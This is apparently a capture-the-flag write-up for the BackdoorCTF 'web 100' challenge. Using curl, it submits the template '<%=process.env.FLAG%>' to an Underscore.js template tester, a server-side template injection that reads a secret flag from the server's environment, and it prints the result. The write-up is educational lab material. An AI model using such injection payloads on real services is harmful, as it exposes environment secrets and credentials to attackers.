None
web100-2
BackdoorCTF - web - 100

In this problem, the challenge text just provided us a URL to the page, https://backdoor-web100.herokuapp.com/, which linked us to the source code on github.


curl 'https://backdoor-web100.herokuapp.com/'
<html>
    <head>
        <title>Underscore Template Tester</title>
        <style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style>
    </head>
    <body>
        <h1>Underscore Template Tester</h1>
        <form action="/templatize" method="POST">
            <p>This app takes in JSON data and a template and mashes them together using underscore.js</p>
            <textarea name="json" rows="10" cols="30" placeholder="Enter JSON data">{"package":"underscore_test","version": "2.9.12"}</textarea>
            <br>
            <textarea name="template" rows="10" cols="30" placeholder="Enter your template here">The name of the package is <%=package%> and its version is <%=version%></textarea>
            <br>
            <input type="submit" value="Convert!">
        </form><br>
        <p>Source code for this is available at https://github.com/backdoor-ctf/web100</p>
    </body>
</html>

Querying the server, it behaves pretty much as expected...

curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%0D%0A%22package%22%3A%22underscore_test%22%2C%0D%0A%22version%22%3A+%222.9.12%22%0D%0A%7D%0D%0A&template=The+name+of+the+package+is+%3C%25%3Dpackage%25%3E+and+its+version+is+%3C%25%3Dversion%25%3E%0D%0A'
json={"package":"underscore_test","version":+"2.9.12"}
&template=The+name+of+the+package+is+<%=package%>+and+its+version+is+<%=version%>
The name of the package is underscore_test and its version is 2.9.12

Going back to the source code reveals a very interesting line in app.js though:

// development only
if ('development' == app.get('env')) {
  app.use(express.errorHandler());
}
if(!process.env.FLAG)
{
  console.error("No flag in environment");
  process.exit(1);
}

So... the flag is stored in the environment on the server. Well, we have limited code execution - lets try to expose it!

curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%7D%0D%0A&template=%3C%25%3Dprocess.env.FLAG%25%3E'
json={}&template=<%=process.env.FLAG%>
16367694ede9faef0efec36845e18ceb

Flag: 16367694ede9faef0efec36845e18ceb


- Kelson (kelson@shysecurity.com)